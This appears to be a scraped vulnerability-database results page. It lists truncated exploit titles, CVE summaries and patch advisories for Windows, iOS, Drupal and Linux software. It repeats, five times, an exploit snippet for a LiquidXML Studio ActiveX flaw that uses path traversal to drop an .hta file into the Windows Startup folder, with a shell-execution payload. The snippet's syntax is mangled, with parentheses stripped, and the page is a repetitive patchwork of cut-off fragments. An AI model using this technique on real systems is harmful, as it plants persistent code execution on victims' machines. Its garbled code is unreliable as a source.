LiquidXML Studio 2012 ActiveX Insecure Method Executable File Creation 0-day

Exploit for windows platform in category local exploits var sofa = "..\..\..\..\..\..\..\..\..\Documents and Settings\All Users\Start Menu\Programs\Startup\thedoctorisin.hta"; var king = "Oh noz, Look what DrIDE did... var x=new ActiveXObject"WScript.Shell"; x.Exec"CALC.EXE"; ";...

LiquidXML Studio 2012 - ActiveX Insecure Method Executable File Creation

var sofa = "..\..\..\..\..\..\..\..\..\Documents and Settings\All Users\Start Menu\Programs\Startup\thedoctorisin.hta"; var king = "Oh noz, Look what DrIDE did... var x=new ActiveXObject"WScript.Shell"; x.Exec"CALC.EXE"; "; target.OpenFilesofa,1; target.AppendStringking; LiquidXML...

LiquidXML Studio 2012 - ActiveX Insecure Method Executable File Creation

LiquidXML Studio 2012 - ActiveX Insecure Method Executable File Creation var sofa = "..\..\..\..\..\..\..\..\..\Documents and Settings\All Users\Start Menu\Programs\Startup\thedoctorisin.hta"; var king = "Oh noz, Look what DrIDE did... var x=new ActiveXObject"WScript.Shell";...

LiquidXML Studio 2010 ActiveX Remote 0-day

Exploit for windows platform in category local exploits var sofa = "..\..\..\..\..\..\..\..\..\Documents and Settings\All Users\Start Menu\Programs\Startup\thedoctorisin.hta"; var king = "Oh noz, Look what DrIDE did... var x=new ActiveXObject"WScript.Shell"; x.Exec"CALC.EXE"; ";...

LiquidXML Studio 2012 Active-X File Creation

var sofa = "..\..\..\..\..\..\..\..\..\Documents and Settings\All Users\Start Menu\Programs\Startup\thedoctorisin.hta"; var king = "Oh noz, Look what DrIDE did... var x=new ActiveXObject"WScript.Shell"; x.Exec"CALC.EXE"; "; target.OpenFilesofa,1; target.AppendStringking; LiquidXML...

Photodex ProShow Producer multiple security vulnerabilities

Buffer overflow on .pxs / .pxt files parsing. Privilege escalations via weak executable permissions and incorrect DLL paths...

Command and Control Used in Sanny APT Attacks Shut Down

Two message boards used by the Sanny malware as a command-and-control channel have been shut down by the Korea Information Security Agency in conjunction with security company FireEye. Sanny is a targeted attack, attributed to attackers in Korea, against individuals working in Russia’s aerospace,...

Code injection

Schweitzer Engineering Laboratories SEL AcSELerator QuickSet before 5.12.0.1 uses weak permissions for its Program Files directory, which allows local users to replace executable files, and consequently gain privileges, via standard filesystem operations...

CVE-2013-0977

dyld in Apple iOS before 6.1.3 and Apple TV before 5.2.1 does not properly manage the state of file loading for Mach-O executable files, which allows local users to bypass intended code-signing requirements via a file that contains overlapping segments...

Design/Logic Flaw

dyld in Apple iOS before 6.1.3 and Apple TV before 5.2.1 does not properly manage the state of file loading for Mach-O executable files, which allows local users to bypass intended code-signing requirements via a file that contains overlapping segments...

CVE-2013-0977

dyld in Apple iOS before 6.1.3 and Apple TV before 5.2.1 does not properly manage the state of file loading for Mach-O executable files, which allows local users to bypass intended code-signing requirements via a file that contains overlapping segments...

Apple iOS < 6.1.3 Multiple Vulnerabilities

Binary data 6718.prm...

CVE-2013-0206

Unrestricted file upload vulnerability in the Live CSS module 6.x-2.x before 6.x-2.1 and 7.x-2.x before 7.x-2.7 for Drupal allows remote authenticated users with the "administer CSS" permissions to execute arbitrary code by uploading a file with an executable extension, then accessing it via a...

CVE-2013-0206

Unrestricted file upload vulnerability in the Live CSS module 6.x-2.x before 6.x-2.1 and 7.x-2.x before 7.x-2.7 for Drupal allows remote authenticated users with the "administer CSS" permissions to execute arbitrary code by uploading a file with an executable extension, then accessing it via a...

Unrestricted file upload

Unrestricted file upload vulnerability in the Live CSS module 6.x-2.x before 6.x-2.1 and 7.x-2.x before 7.x-2.7 for Drupal allows remote authenticated users with the "administer CSS" permissions to execute arbitrary code by uploading a file with an executable extension, then accessing it via a...

Fedora 17 : zfs-fuse-0.7.0-3.fc17 (2013-3382)

Correct executable stacks in some binaries. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues...

Fedora 18 : zfs-fuse-0.7.0-10.fc18 (2013-3425)

Correct executable stacks in some binaries. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues...

Ubuntu 8.04 LTS / 8.10 / 9.04 : nss regression (USN-810-3)

USN-810-1 fixed vulnerabilities in NSS. Jozsef Kadlecsik noticed that the new libraries on amd64 did not correctly set stack memory flags, and caused applications using NSS e.g. Firefox to have an executable stack. This reduced the effectiveness of some defensive security protections. This update...

Insecure Windows Service Permissions

At least one Windows service executable with insecure permissions was detected on the remote host. Services configured to use an executable with weak permissions are vulnerable to privilege escalation attacks. An unprivileged user could modify or overwrite the executable with arbitrary code, whic...

CVE-2012-1568

The ExecShield feature in a certain Red Hat patch for the Linux kernel in Red Hat Enterprise Linux RHEL 5 and 6 and Fedora 15 and 16 does not properly handle use of many shared libraries by a 32-bit executable file, which makes it easier for context-dependent attackers to bypass the ASLR protecti...